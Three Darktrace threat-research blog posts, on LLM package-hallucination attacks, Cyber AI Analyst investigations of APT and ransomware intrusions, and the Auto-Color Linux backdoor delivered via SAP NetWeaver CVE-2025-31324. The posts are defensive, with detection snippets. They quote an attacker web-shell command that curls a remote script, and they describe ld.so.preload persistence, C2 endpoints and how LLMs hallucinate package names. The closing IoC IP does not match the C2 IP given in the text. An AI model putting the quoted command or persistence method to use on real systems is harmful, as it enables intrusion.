October 30, 2023

Exploring AI Threats: Package Hallucination Attacks

Learn how malicious actors exploit errors in generative AI tools to launch package hallucination attacks. Read how Darktrace products detect and prevent these threats!
Inside the SOC
Darktrace cyber analysts are world-class experts in threat intelligence, threat hunting and incident response, and provide 24/7 SOC support to thousands of Darktrace customers around the globe. Inside the SOC is exclusively authored by these experts, providing analysis of cyber incidents and threat trends, based on real-world experience in the field.
Written by
Charlotte Thompson
Cyber Analyst
Written by
Tiana Kelly
Deputy Team Lead, London & Cyber Analyst

AI tools open doors for threat actors

On November 30, 2022, OpenAI, an artificial intelligence (AI) research and development company, launched ChatGPT, a free conversational language generation model. The launch was the culmination of development ongoing since 2018; it represented the latest innovation in the generative AI boom and made generative AI tools accessible to the general population for the first time.

ChatGPT is estimated to currently have at least 100 million users, and in August 2023 the site reached 1.43 billion visits [1]. Darktrace data indicated that, as of March 2023, 74% of active customer environments have employees using generative AI tools in the workplace [2].

However, with new tools come new opportunities for threat actors to exploit and use them maliciously, expanding their arsenal.

Much consideration has been given to mitigating the impact of the increased linguistic complexity in social engineering and phishing attacks resulting from generative AI tool use. Darktrace observed a 135% increase in ‘novel social engineering attacks’ across thousands of active Darktrace/Email™ customers from January to February 2023, corresponding with the widespread adoption of ChatGPT and its peers [3].

Far less consideration, however, has been given to impacts stemming from errors intrinsic to generative AI tools themselves. One such error is the AI hallucination.

What is an AI hallucination?

An AI “hallucination” occurs when the predictive elements of a generative AI tool or large language model (LLM) produce an unexpected or factually incorrect response that does not align with the model’s training data [4]. This differs from the regular and intended behavior of an AI model, which should provide a response grounded in the data it was trained on.

Why are AI hallucinations a problem?

Despite the term suggesting a rare phenomenon, hallucinations occur far more often than users might expect, as the models underlying LLMs are purely predictive and optimize for the most probable text or outcome rather than factual accuracy.

Given the widespread use of generative AI tools in the workplace, employees are significantly more likely to encounter an AI hallucination. Furthermore, if these fabricated responses are taken at face value, they could cause significant issues for an organization.

Use of generative AI in software development

Software developers may use generative AI for recommendations on how to optimize their scripts or code, or to find packages to import for various purposes. When a developer asks an LLM for a specific piece of code or for help solving a specific problem, the response will often point to a third-party package. However, packages recommended by generative AI tools can themselves be hallucinations: packages that have never been published, or, more precisely, that had not been published before the cut-off date of the model’s training data. If the model repeatedly suggests such a non-existent package and developers copy the accompanying code snippet wholesale, those developers, and the software they produce, are left vulnerable to attack.

Research conducted by Vulcan revealed the prevalence of AI hallucinations when ChatGPT is asked questions related to coding. After sourcing a sample of commonly asked coding questions from Stack Overflow, a question-and-answer website for programmers, researchers queried ChatGPT (in the context of Node.js and Python) and reviewed its responses. In 20% of the responses provided by ChatGPT pertaining to Node.js at least one un-published package was included, whilst the figure sat at around 35% for Python [4].

Hallucinations can be unpredictable, but would-be attackers are able to find packages to create by asking generative AI tools generic questions and checking whether the suggested packages exist already. As such, attacks using this vector are unlikely to target specific organizations, instead posing more of a widespread threat to users of generative AI tools.
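To illustrate how little effort this probing requires, the sketch below (illustrative Python, using the public PyPI and npm registry endpoints) checks whether a handful of package names actually exist. Any name that returns a 404 is unclaimed: from an attacker's perspective a squatting candidate, and from a defender's perspective exactly the kind of suggestion that should never be installed blindly. The package names in the example are hypothetical placeholders.

```python
import urllib.error
import urllib.request

def exists_on_registry(url: str) -> bool:
    """Return True if the registry responds with HTTP 200 for this package URL."""
    try:
        with urllib.request.urlopen(url, timeout=10) as resp:
            return resp.status == 200
    except urllib.error.HTTPError:
        return False  # 404 means the name is currently unclaimed

def pypi_exists(name: str) -> bool:
    return exists_on_registry(f"https://pypi.org/pypi/{name}/json")

def npm_exists(name: str) -> bool:
    return exists_on_registry(f"https://registry.npmjs.org/{name}")

# Hypothetical names an LLM might have suggested in a generated snippet
suggested = ["requests", "totally-made-up-auth-helper"]

for pkg in suggested:
    for registry, check in (("PyPI", pypi_exists), ("npm", npm_exists)):
        state = "published" if check(pkg) else "NOT published (possible hallucination)"
        print(f"{registry:4} {pkg}: {state}")
```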

Malicious packages as attack vectors

Although AI hallucinations can be unpredictable, and responses given by generative AI tools may not always be consistent, malicious actors are able to discover AI hallucinations by adopting the approach used by Vulcan. This allows hallucinated packages to be used as attack vectors. Once a malicious actor has discovered a hallucination of an un-published package, they are able to create a package with the same name and include a malicious payload, before publishing it. This is known as a malicious package.

Malicious packages could also be recommended by generative AI tools in the form of pre-existing packages. A user may be recommended a package that had previously been confirmed to contain malicious content, or a package that is no longer maintained and, therefore, is more vulnerable to hijack by malicious actors.

In such scenarios it is not necessary to manipulate the training data (data poisoning) to achieve the desired outcome for the malicious actor, thus a complex and time-consuming attack phase can easily be bypassed.

An unsuspecting software developer may incorporate a malicious package into their code, rendering it harmful. Deployment of this code could then result in compromise and escalation into a full-blown cyber-attack.

Figure 1: Flow diagram depicting the initial stages of an AI Package Hallucination Attack.

For providers of Software-as-a-Service (SaaS) products, this attack vector may represent an even greater risk. Such organizations may have a higher proportion of employed software developers than other organizations of comparable size. A threat actor, therefore, could utilize this attack vector as part of a supply chain attack, whereby a malicious payload becomes incorporated into trusted software and is then distributed to multiple customers. This type of attack could have severe consequences including data loss, the downtime of critical systems, and reputational damage.

How could Darktrace detect an AI Package Hallucination Attack?

In June 2023, Darktrace introduced a range of DETECT™ and RESPOND™ models designed to identify the use of generative AI tools within customer environments and to autonomously perform inhibitive actions in response to such detections. These models trigger based on connections to endpoints associated with generative AI tools; as such, Darktrace’s detection of an AI Package Hallucination Attack would likely begin with the breaching of one of the following DETECT models:

  • Compliance / Anomalous Upload to Generative AI
  • Compliance / Beaconing to Rare Generative AI and Generative AI
  • Compliance / Generative AI

Should generative AI tool use not be permitted by an organization, the Darktrace RESPOND model ‘Antigena / Network / Compliance / Antigena Generative AI Block’ can be activated to autonomously block connections to endpoints associated with generative AI, thus preventing an AI Package Hallucination attack before it can take hold.

Once a malicious package has been recommended, it may be downloaded from GitHub, a platform and cloud-based service used to store and manage code. Darktrace DETECT is able to identify when a device has performed a download from an open-source repository such as GitHub using the following models:

  • Device / Anomalous GitHub Download
  • Device / Anomalous Script Download Followed By Additional Packages

Whatever goal the malicious package has been designed to fulfil will determine the next stages of the attack. Due to their highly flexible nature, AI package hallucinations could be used as an attack vector to deliver a large variety of different malware types.

As GitHub is a commonly used service by software developers and IT professionals alike, traditional security tools may not alert customer security teams to such GitHub downloads, meaning malicious downloads may go undetected. Darktrace’s anomaly-based approach to threat detection, however, enables it to recognize subtle deviations in a device’s pre-established pattern of life which may be indicative of an emerging attack.

Subsequent anomalous activity representing the possible progression of the kill chain as part of an AI Package Hallucination Attack could then trigger an Enhanced Monitoring model. Enhanced Monitoring models are high-fidelity indicators of potential malicious activity that are investigated by the Darktrace analyst team as part of the Proactive Threat Notification (PTN) service offered by the Darktrace Security Operation Center (SOC).

Conclusion

Employees are often considered the first line of defense in cyber security; this is particularly true in the face of an AI Package Hallucination Attack.

As the use of generative AI becomes more accessible and an increasingly prevalent tool in an attacker’s toolbox, organizations will benefit from implementing company-wide policies that define expectations around the use of such tools. It is simple, yet critical, for employees to fact-check responses provided to them by generative AI tools. All packages recommended by generative AI should also be verified against non-generated data from external third-party or internal sources. It is also good practice to treat packages with very few downloads with caution, as this can indicate that a package is untrustworthy or malicious.
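One way to put that advice into practice is to pull a package's metadata from the index before installing it. The sketch below (illustrative Python, using PyPI's public JSON API and assuming the recommended package is a Python package) reports a name's first upload date and release count; a package that exists but was first published very recently, with only one or two releases, warrants extra scrutiny. Download counts and maintainer history, which this sketch does not fetch, are worth checking through the index website or internal tooling as well.

```python
import json
import urllib.request

def pypi_profile(name: str) -> dict:
    """Fetch basic PyPI metadata useful when vetting an AI-recommended package."""
    url = f"https://pypi.org/pypi/{name}/json"
    with urllib.request.urlopen(url, timeout=10) as resp:
        data = json.load(resp)

    upload_times = [
        file_info["upload_time"]
        for files in data["releases"].values()
        for file_info in files
    ]
    return {
        "name": data["info"]["name"],
        "summary": data["info"]["summary"],
        "release_count": len(data["releases"]),
        "first_upload": min(upload_times) if upload_times else "no files uploaded",
    }

profile = pypi_profile("requests")  # substitute the package name the LLM suggested
print(profile)
if profile["release_count"] < 3:
    print("Warning: very few releases -- review the project before installing.")
```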

As of September 2023, ChatGPT Plus and Enterprise users were able to use the tool to browse the internet, expanding the data ChatGPT can access beyond the previous training data cut-off of September 2021 [5]. This feature will be expanded to all users soon [6]. ChatGPT providing up-to-date responses could prompt the evolution of this attack vector, allowing attackers to publish malicious packages which could subsequently be recommended by ChatGPT.

It is inevitable that a greater embrace of AI tools in the workplace will be seen in the coming years as the AI technology advances and existing tools become less novel and more familiar. By fighting fire with fire, using AI technology to identify AI usage, Darktrace is uniquely placed to detect and take preventative action against malicious actors capitalizing on the AI boom.

Credit to Charlotte Thompson, Cyber Analyst, and Tiana Kelly, Deputy Team Lead, London & Cyber Analyst.

References

[1] https://seo.ai/blog/chatgpt-user-statistics-facts

[2] https://darktrace.com/news/darktrace-addresses-generative-ai-concerns

[3] https://darktrace.com/news/darktrace-email-defends-organizations-against-evolving-cyber-threat-landscape

[4] https://vulcan.io/blog/ai-hallucinations-package-risk?nab=1&utm_referrer=https%3A%2F%2Fwww.google.com%2F

[5] https://twitter.com/OpenAI/status/1707077710047216095

[6] https://www.reuters.com/technology/openai-says-chatgpt-can-now-browse-internet-2023-09-27/



August 1, 2025

Darktrace's Cyber AI Analyst in Action: 4 Real-World Investigations into Advanced Threat Actors


From automation to intelligence

There’s a lot of attention around AI in cybersecurity right now, similar to how important automation felt about 15 years ago. But this time, the scale and speed of change feel different.

In the context of cybersecurity investigations, the application of AI can significantly enhance an organization's ability to detect, respond to, and recover from incidents. It enables a more proactive approach to cybersecurity, ensuring a swift and effective response to potential threats.

At Darktrace, we’ve learned that no single AI technique can solve cybersecurity on its own. We employ a multi-layered AI approach, strategically integrating a diverse set of techniques both sequentially and hierarchically. This layered architecture allows us to deliver proactive, adaptive defense tailored to each organization’s unique environment.

Darktrace uses a range of AI techniques to perform in-depth analysis and investigation of anomalies identified by lower-level alerts, in particular automating Levels 1 and 2 of the Security Operations Centre (SOC) team’s workflow. This saves teams time and resources by automating repetitive and time-consuming tasks carried out during investigation workflows. We call this core capability Cyber AI Analyst.

How Darktrace’s Cyber AI™ Analyst works

Cyber AI Analyst mimics the way a human carries out a threat investigation: evaluating multiple hypotheses, analyzing logs for involved assets, and correlating findings across multiple domains. It will then generate an alert with full technical details, pulling relevant findings into a single pane of glass to track the entire attack chain.
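Darktrace has not published the internals of Cyber AI Analyst, but the general idea of correlating low-level detections into a single incident can be illustrated with a toy sketch: group alerts that share an asset and fall within a common time window, so an analyst reviews one narrative rather than dozens of isolated events. The data model, field names, and six-hour window below are purely illustrative assumptions, not the product's logic.

```python
from collections import defaultdict
from dataclasses import dataclass
from datetime import datetime, timedelta

@dataclass
class Alert:
    device: str        # asset the detection fired on
    time: datetime     # when it fired
    summary: str       # human-readable description of the detection

def correlate(alerts: list[Alert], window: timedelta = timedelta(hours=6)) -> list[list[Alert]]:
    """Toy correlation: alerts on the same device within a rolling window form one incident."""
    by_device: dict[str, list[Alert]] = defaultdict(list)
    for alert in sorted(alerts, key=lambda a: a.time):
        by_device[alert.device].append(alert)

    incidents: list[list[Alert]] = []
    for device_alerts in by_device.values():
        current = [device_alerts[0]]
        for alert in device_alerts[1:]:
            if alert.time - current[-1].time <= window:
                current.append(alert)      # same unfolding incident
            else:
                incidents.append(current)  # gap too large: start a new incident
                current = [alert]
        incidents.append(current)
    return incidents
```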

Learn more about how Cyber AI Analyst accomplishes this here:

This blog will highlight four examples where Darktrace’s agentic AI, Cyber AI Analyst, successfully identified the activity of sophisticated threat actors, including nation state adversaries. The final example will include step-by-step details of the investigations conducted by Cyber AI Analyst.


Case 1: Cyber AI Analyst vs. ShadowPad Malware: East Asian Advanced Persistent Threat (APT)

In March 2025, Darktrace detailed a lengthy investigation into two separate threads of likely state-linked intrusion activity in a customer network, showcasing Cyber AI Analyst’s ability to identify different activity threads and piece them together.

The first of these threads...

occurred in July 2024 and involved a malicious actor establishing a foothold in the customer’s virtual private network (VPN) environment, likely via the exploitation of an information disclosure vulnerability (CVE-2024-24919) affecting Check Point Security Gateway devices.

Using compromised service account credentials, the actor then moved laterally across the network via RDP and SMB, with files related to the modular backdoor ShadowPad being delivered to targeted internal systems. Targeted systems went on to communicate with a C2 server via both HTTPS connections and DNS tunnelling.

The second thread of activity...

which occurred several months later, in October 2024, involved a malicious actor infiltrating the customer's desktop environment via SMB and WMI.

The actor used these compromised desktops to discriminately collect sensitive data from a network share before exfiltrating such data to a web of likely compromised websites.

For each of these threads of activity, Cyber AI Analyst was able to identify and piece together the relevant intrusion steps by hypothesizing, analyzing, and then generating a singular view of the full attack chain.

Figure 1: Cyber AI Analyst identifying and piecing together the various steps of the ShadowPad intrusion activity.
Figure 2: Cyber AI Analyst Incident identifying and piecing together the various steps of the data theft activity.

These Cyber AI Analyst investigations enabled a quicker understanding of the threat actor’s sequence of events and, in some cases, led to faster containment.

Read the full detailed blog on Darktrace’s ShadowPad investigation here!

Case 2: Cyber AI Analyst vs. Blind Eagle: South American APT

Since 2018, APT-C-36, also known as Blind Eagle, has been observed performing cyber-attacks targeting various sectors across multiple countries in Latin America, with a particular focus on Colombia.

In February 2025, Cyber AI Analyst provided strong coverage of a Blind Eagle intrusion targeting a South America-based public transport provider, identifying and correlating various stages of the attack, including tooling.

Figure 3: Cyber AI Analyst investigation linking likely Remcos C2 traffic, a suspicious file download, and eventual data exfiltration.
Figure 4: Cyber AI Analyst identifying unusual data uploads to another likely Remcos C2 endpoint and correlating the individual detections involved in this compromise as part of a broader incident encompassing C2 connectivity, suspicious downloads, and external data transfers.

In this campaign, threat actors have been observed using phishing emails to deliver malicious URL links to targeted recipients, similar to the way threat actors have previously been observed exploiting CVE-2024-43451, a vulnerability in Microsoft Windows that allows the disclosure of a user’s NTLMv2 password hash upon minimal interaction with a malicious file [4].

In late February 2025, Darktrace observed activity assessed with medium confidence to be associated with Blind Eagle on the network of a customer in Colombia. Darktrace observed a device on the customer’s network being directed over HTTP to a rare external IP, namely 62[.]60[.]226[.]112, which had never previously been seen in this customer’s environment and was geolocated in Germany.

Read the full Blind Eagle threat story here!

Case 3: Cyber AI Analyst vs. Ransomware Gang

In mid-March 2025, a malicious actor gained access to a customer’s network through their VPN. Using the credential 'tfsservice', the actor conducted network reconnaissance, before leveraging the Zerologon vulnerability and the Directory Replication Service to obtain credentials for the high-privilege accounts, ‘_svc_generic’ and ‘administrator’.

The actor then abused these account credentials to pivot over RDP to internal servers, such as DCs. Targeted systems showed signs of using various tools, including the remote monitoring and management (RMM) tool AnyDesk, the proxy tool SystemBC, the data compression tool WinRAR, and the data transfer tool WinSCP.

The actor finally collected and exfiltrated several gigabytes of data to the cloud storage services, MEGA, Backblaze, and LimeWire, before returning to attempt ransomware detonation.

Figure 5: Cyber AI Analyst detailing its full investigation, linking 34 related Incident Events in a single pane of glass.

Cyber AI Analyst identified, analyzed, and reported on all corners of this attack, correlating the 34 Incident Events in its threat tray into a single view of the attack chain.

Cyber AI Analyst identified activity associated with the following tactics across the MITRE attack chain:

  • Initial Access
  • Persistence
  • Privilege Escalation
  • Credential Access
  • Discovery
  • Lateral Movement
  • Execution
  • Command and Control
  • Exfiltration

Case 4: Cyber AI Analyst vs. RansomHub

Figure 6: Cyber AI Analyst presenting its full investigation into RansomHub, correlating 38 Incident Events.

A malicious actor appeared to have entered the customer’s network via their VPN, using a likely attacker-controlled device named 'DESKTOP-QIDRDSI'. The actor then pivoted to other systems via RDP and distributed payloads over SMB.

Some systems targeted by the attacker went on to exfiltrate data to the likely ReliableSite Bare Metal server, 104.194.10[.]170, via HTTP POSTs over port 5000. Others executed RansomHub ransomware, as evidenced by their SMB-based distribution of ransom notes named 'README_b2a830.txt' and their addition of the extension '.b2a830' to the names of files in network shares.

Through its live investigation of this attack, Cyber AI Analyst created and reported on 38 Incident Events that formed part of a single, wider incident, providing a full picture of the threat actor’s behavior and tactics, techniques, and procedures (TTPs). It identified activity associated with the following tactics across the MITRE attack chain:

  • Execution
  • Discovery
  • Lateral Movement
  • Collection
  • Command and Control
  • Exfiltration
  • Impact (i.e., encryption)
Figure 7: Step-by-step details of one of the network scanning investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 8: Step-by-step details of one of the administrative connectivity investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 9: Step-by-step details of one of the external data transfer investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 10: Step-by-step details of one of the data collection and exfiltration investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.
Figure 11: Step-by-step details of one of the ransomware encryption investigations performed by Cyber AI Analyst in response to an anomaly alerted by Darktrace.

Conclusion

Security teams are challenged to keep up with a rapidly evolving cyber-threat landscape, now powered by AI in the hands of attackers, alongside the growing scope and complexity of digital infrastructure across the enterprise.

Traditional security methods, even those that use some simple machine learning, are no longer sufficient: these tools cannot keep pace with every possible attack vector, nor respond quickly enough to machine-speed attacks whose complexity outstrips known and expected patterns. Security teams require a step up in their detection capabilities, leveraging machine learning to understand the environment, filter out the noise, and take action where threats are identified. This is where Cyber AI Analyst steps in to help.

Credit to Nathaniel Jones (VP, Security & AI Strategy, FCISO), Sam Lister (Security Researcher), Emma Foulger (Global Threat Research Operations Lead), and Ryan Traill (Analyst Content Lead)



July 30, 2025

Auto-Color Backdoor: How Darktrace Thwarted a Stealthy Linux Intrusion


In April 2025, Darktrace identified an Auto-Color backdoor malware attack taking place on the network of a US-based chemicals company.

Over the course of three days, a threat actor gained access to the customer’s network, attempted to download several suspicious files and communicated with malicious infrastructure linked to Auto-Color malware.

After Darktrace successfully blocked the malicious activity and contained the attack, the Darktrace Threat Research team conducted a deeper investigation into the malware.

They discovered that the threat actor had exploited CVE-2025-31324 to deploy Auto-Color as part of a multi-stage attack — the first observed pairing of SAP NetWeaver exploitation with the Auto-Color malware.

Furthermore, Darktrace’s investigation revealed that Auto-Color is now employing suppression tactics to cover its tracks and evade detection when it is unable to complete its kill chain.

What is CVE-2025-31324?

On April 24, 2025, the software provider SAP SE disclosed a critical vulnerability in its SAP Netweaver product, namely CVE-2025-31324. The exploitation of this vulnerability would enable malicious actors to upload files to the SAP Netweaver application server, potentially leading to remote code execution and full system compromise. Despite the urgent disclosure of this CVE, the vulnerability has been exploited on several systems [1]. More information on CVE-2025-31324 can be found in our previous discussion.

What is Auto-Color Backdoor Malware?

The Auto-Color backdoor malware, named after its ability to rename itself to “/var/log/cross/auto-color” after execution, was first observed in the wild in November 2024 and is categorized as a Remote Access Trojan (RAT).

Auto-Color has primarily been observed targeting universities and government institutions in the US and Asia [2].

What does Auto-Color Backdoor Malware do?

Auto-Color is known to target Linux systems by exploiting built-in system features like ld.so.preload, making it highly evasive and dangerous; it specifically aims for persistent system compromise through shared object injection.

Each instance uses a unique file and hash, due to its statically compiled and encrypted command-and-control (C2) configuration, which embeds data at creation rather than retrieving it dynamically at runtime. The behavior of the malware varies based on the privilege level of the user executing it and the system configuration it encounters.

How does Auto-Color work?

The malware’s process begins with a privilege check. If the malware is executed without root privileges, it skips the library implant phase and continues with limited functionality, avoiding actions that require system-level access, such as library installation and preload configuration, and instead maintains minimal activity while continuing to attempt C2 communication. This demonstrates adaptive behavior and an effort to reduce detection when running in restricted environments.

If run as root, the malware performs a more invasive installation, installing a malicious shared object, namely libcext.so.2, masquerading as a legitimate C utility library, a tactic used to blend in with trusted system components. It uses dynamic linker functions like dladdr() to locate the base system library path; if this fails, it defaults to /lib.

Gaining persistence through preload manipulation

To ensure persistence, Auto-Color modifies or creates /etc/ld.so.preload, inserting a reference to the malicious library. This is a powerful Linux persistence technique as libraries listed in this file are loaded before any others when running dynamically linked executables, meaning Auto-Color gains the ability to silently hook and override standard system functions across nearly all applications.

Once complete, the ELF binary copies and renames itself to “/var/log/cross/auto-color”, placing the implant in a hidden directory that resembles system logs. It then writes the malicious shared object to the base library path.
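Because this persistence mechanism leaves concrete artefacts on disk, defenders can hunt for it directly. The sketch below (illustrative Python, run with root read access on a Linux host) flags any entries in /etc/ld.so.preload, a file that does not exist at all on most systems, and checks for the specific paths associated with Auto-Color. The library location is an assumption: the malware writes to whatever base library path it resolves, so /lib is only the reported default.

```python
from pathlib import Path

PRELOAD_FILE = Path("/etc/ld.so.preload")
# Artefact paths reported in public analysis of Auto-Color; adjust to your environment
SUSPECT_PATHS = [
    Path("/var/log/cross/auto-color"),
    Path("/lib/libcext.so.2"),
]

def check_preload() -> None:
    """/etc/ld.so.preload is absent on most hosts, so any entry deserves review."""
    if PRELOAD_FILE.exists():
        print(f"[!] {PRELOAD_FILE} exists -- preloaded libraries:")
        for line in PRELOAD_FILE.read_text().splitlines():
            if line.strip():
                print(f"    {line.strip()}")
    else:
        print(f"[ok] {PRELOAD_FILE} not present")

def check_known_artefacts() -> None:
    for path in SUSPECT_PATHS:
        if path.exists():
            print(f"[!] suspicious file present: {path}")

if __name__ == "__main__":
    check_preload()
    check_known_artefacts()
```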

A delayed payload activated by outbound communication

To complete its chain, Auto-Color attempts to establish an outbound TLS connection to a hardcoded IP over port 443. This enables the malware to receive commands or payloads from its operator via API requests [2].

Interestingly, Darktrace found that Auto-Color suppresses most of its malicious behavior if this connection fails - an evasion tactic commonly employed by advanced threat actors. This ensures that in air-gapped or sandboxed environments, security analysts may be unable to observe or analyze the malware’s full capabilities.

If the C2 server is unreachable, Auto-Color effectively stalls and refrains from deploying its full malicious functionality, appearing benign to analysts. This behavior prevents reverse engineering efforts from uncovering its payloads, credential harvesting mechanisms, or persistence techniques.

In real-world environments, this means the most dangerous components of the malware only activate when the attacker is ready, remaining dormant during analysis or detonation, and thereby evading detection.

Darktrace’s coverage of the Auto-Color malware

Initial alert to Darktrace’s SOC

On April 28, 2025, Darktrace’s Security Operations Centre (SOC) received an alert for a suspicious ELF file downloaded on an internet-facing device likely running SAP Netweaver. ELF files are executable files specific to Linux, and in this case, the unexpected download of one strongly indicated a compromise, marking the delivery of the Auto-Color malware.

Figure 1: A timeline breaking down the stages of the attack

Early signs of unusual activity detected by Darktrace

While the first signs of unusual activity were detected on April 25, with several incoming connections using URIs containing /developmentserver/metadatauploader, potentially scanning for the CVE-2025-31324 vulnerability, active exploitation did not begin until two days later.

Initial compromise via ZIP file download followed by DNS tunnelling requests

In the early hours of April 27, Darktrace detected an incoming connection from the malicious IP address 91.193.19[.]109.

The telltale sign of CVE-2025-31324 exploitation was the presence of the URI ‘/developmentserver/metadatauploader?CONTENTTYPE=MODEL&CLIENT=1’, combined with a ZIP file download.

The device immediately made a DNS request for the Out-of-Band Application Security Testing (OAST) domain aaaaaaaaaaaa[.]d06oojugfd4n58p4tj201hmy54tnq4rak[.]oast[.]me.

OAST is commonly used by threat actors to test for exploitable vulnerabilities, but it can also be leveraged to tunnel data out of a network via DNS requests.
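For teams that want to hunt for this activity in their own telemetry, a minimal starting point (illustrative Python; it assumes plain-text web or reverse-proxy access logs with the request line on each row) is to flag any request referencing /developmentserver/metadatauploader, since legitimate traffic to that path should be rare on most estates.

```python
import re
import sys

# URI fragment associated with CVE-2025-31324 exploitation attempts
PATTERN = re.compile(r"/developmentserver/metadatauploader", re.IGNORECASE)

def hunt(log_path: str) -> None:
    """Print any access-log lines that reference the metadatauploader endpoint."""
    with open(log_path, "r", errors="replace") as handle:
        for line_no, line in enumerate(handle, start=1):
            if PATTERN.search(line):
                print(f"{log_path}:{line_no}: {line.rstrip()}")

if __name__ == "__main__":
    # Usage: python hunt_metadatauploader.py access.log proxy.log ...
    for path in sys.argv[1:]:
        hunt(path)
```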

Darktrace’s Autonomous Response capability quickly intervened, enforcing a “pattern of life” on the offending device for 30 minutes. This ensured the device could not deviate from its expected behavior or connections, while still allowing it to carry out normal business operations.

Figure 2: Alerts from the device’s Model Alert Log showing possible DNS tunnelling requests to ‘request bin’ services.
Figure 3: Darktrace’s Autonomous Response enforcing a “pattern of life” on the compromised device following a suspicious tunnelling connection.

Continued malicious activity

The device continued to receive incoming connections with URIs containing ‘/developmentserver/metadatauploader’. In total, seven files were downloaded (see filenames in the Appendices).

Around 10 hours later, the device made a DNS request for ‘ocr-freespace.oss-cn-beijing.aliyuncs[.]com’.

In the same second, it also received a connection from 23.186.200[.]173 with the URI ‘/irj/helper.jsp?cmd=curl -O hxxps://ocr-freespace.oss-cn-beijing.aliyuncs[.]com/2025/config.sh’, which downloaded a shell script named config.sh.

Execution

This script was executed via the helper.jsp file, which had been downloaded during the initial exploit, a technique also observed in similar SAP Netweaver exploits [4].

Darktrace subsequently observed the device making DNS and SSL connections to the same endpoint, with another inbound connection from 23.186.200[.]173 and the same URI observed again just ten minutes later.

The device then went on to make several connections to 47.97.42[.]177 over port 3232, an endpoint associated with Supershell, a C2 platform linked to backdoors and commonly deployed by China-affiliated threat groups [5].

Less than 12 hours later, and just 24 hours after the initial exploit, the attacker downloaded an ELF file from hxxp://146.70.41[.]178:4444/logs, which marked the delivery of the Auto-Color malware.

Figure 4: Darktrace’s detection of unusual outbound connections and the subsequent file download from hxxp://146.70.41[.]178:4444/logs, as identified by Cyber AI Analyst.

A deeper investigation into the attack

Darktrace’s findings indicate that CVE-2025-31324 was leveraged in this instance to launch a second-stage attack, involving the compromise of the internet-facing device and the download of an ELF file representing the Auto-Color malware—an approach that has also been observed in other cases of SAP NetWeaver exploitation [4].

Darktrace identified the activity as highly suspicious, triggering multiple alerts that prompted triage and further investigation by the SOC as part of the Darktrace Managed Detection and Response (MDR) service.

During this investigation, Darktrace analysts opted to extend all previously applied Autonomous Response actions for an additional 24 hours, providing the customer’s security team time to investigate and remediate.

Figure 5: Cyber AI Analyst’s investigation into the unusual connection attempts from the device to the C2 endpoint.

At the host level, the malware began by assessing its privilege level; in this case, it likely detected root access and proceeded without restraint. Following this, the malware began the chain of events to establish and maintain persistence on the device, ultimately culminating in an outbound connection attempt to its hardcoded C2 server.

Figure 6: Cyber AI Analyst’s investigation into the unusual connection attempts from the device to the C2 endpoint.

Over a six-hour period, Darktrace detected numerous attempted connections to the endpoint 146.70.41[.]178 over port 443. In response, Darktrace’s Autonomous Response swiftly intervened to block these malicious connections.

Given that Auto-Color relies heavily on C2 connectivity to complete its execution and uses shared object preloading to hijack core functions without modifying existing binaries, the absence of a successful connection to its C2 infrastructure (in this case, 146.70.41[.]178) causes the malware to sleep before trying to reconnect.

While Darktrace’s analysis was limited by the absence of a live C2, prior research into its command structure reveals that Auto-Color supports a modular C2 protocol. This includes reverse shell initiation (0x100), file creation and execution tasks (0x2xx), system proxy configuration (0x300), and global payload manipulation (0x4xx). Additionally, core command IDs such as 0, 1, 2, 4, and 0xF cover basic system profiling and even include a kill switch that can trigger self-removal of the malware [2]. This layered command set reinforces the malware’s flexibility and its dependence on live operator control.
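As a compact summary of that reported command set, the sketch below models it as a lookup table. The IDs and behaviors are those described in the cited research [2]; the dispatch helper itself is an illustrative reconstruction, not code recovered from the binary.

```python
# Command IDs reported for Auto-Color's C2 protocol (per the cited research);
# the dispatch helper below is illustrative, not code recovered from the malware.
COMMAND_RANGES = [
    (0x100, 0x100, "initiate reverse shell"),
    (0x200, 0x2FF, "file creation and execution tasks"),
    (0x300, 0x300, "configure system proxy"),
    (0x400, 0x4FF, "global payload manipulation"),
]
CORE_COMMANDS = {
    0x0: "basic system profiling",
    0x1: "basic system profiling",
    0x2: "basic system profiling",
    0x4: "basic system profiling",
    0xF: "kill switch / self-removal",
}

def describe(command_id: int) -> str:
    """Map an observed command ID to the behavior reported in public analysis."""
    if command_id in CORE_COMMANDS:
        return CORE_COMMANDS[command_id]
    for low, high, meaning in COMMAND_RANGES:
        if low <= command_id <= high:
            return meaning
    return "unknown / undocumented command"

print(hex(0x100), "->", describe(0x100))
```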

Thanks to the timely intervention of Darktrace’s SOC team, who extended the Autonomous Response actions as part of the MDR service, the malicious connections remained blocked. This proactive response prevented the malware from escalating, buying the customer’s security team valuable time to address the threat.

Conclusion

Ultimately, this incident highlights the critical importance of addressing high-severity vulnerabilities, as they can rapidly lead to more persistent and damaging threats within an organization’s network. Vulnerabilities like CVE-2025-31324 continue to be exploited by threat actors to gain access to and compromise internet-facing systems. In this instance, the download of Auto-Color malware was just one of many potential malicious actions the threat actor could have initiated.

From initial intrusion to the failed establishment of C2 communication, the Auto-Color malware showed a clear understanding of Linux internals and demonstrated calculated restraint designed to minimize exposure and reduce the risk of detection. However, Darktrace’s ability to detect this anomalous activity, and to respond both autonomously and through its MDR offering, ensured that the threat was contained. This rapid response gave the customer’s internal security team the time needed to investigate and remediate, ultimately preventing the attack from escalating further.

Credit to Harriet Rayner (Cyber Analyst), Owen Finn (Cyber Analyst), Tara Gould (Threat Research Lead) and Ryan Traill (Analyst Content Lead)

Appendices

MITRE ATT&CK Mapping

Malware - RESOURCE DEVELOPMENT - T1588.001

Drive-by Compromise - INITIAL ACCESS - T1189

Data Obfuscation - COMMAND AND CONTROL - T1001

Non-Standard Port - COMMAND AND CONTROL - T1571

Exfiltration Over Unencrypted/Obfuscated Non-C2 Protocol - EXFILTRATION - T1048.003

Masquerading - DEFENSE EVASION - T1036

Application Layer Protocol - COMMAND AND CONTROL - T1071

Unix Shell – EXECUTION - T1059.004

LC_LOAD_DYLIB Addition – PERSISTENCE - T1546.006

Match Legitimate Resource Name or Location – DEFENSE EVASION - T1036.005

Web Protocols – COMMAND AND CONTROL - T1071.001

Indicators of Compromise (IoCs)

Filenames downloaded:

  • exploit.properties
  • helper.jsp
  • 0KIF8.jsp
  • cmd.jsp
  • test.txt
  • uid.jsp
  • vregrewfsf.jsp

Auto-Color sample:

  • 270fc72074c697ba5921f7b61a6128b968ca6ccbf8906645e796cfc3072d4c43 (sha256)

IP Addresses

  • 146[.]70[.]19[.]122
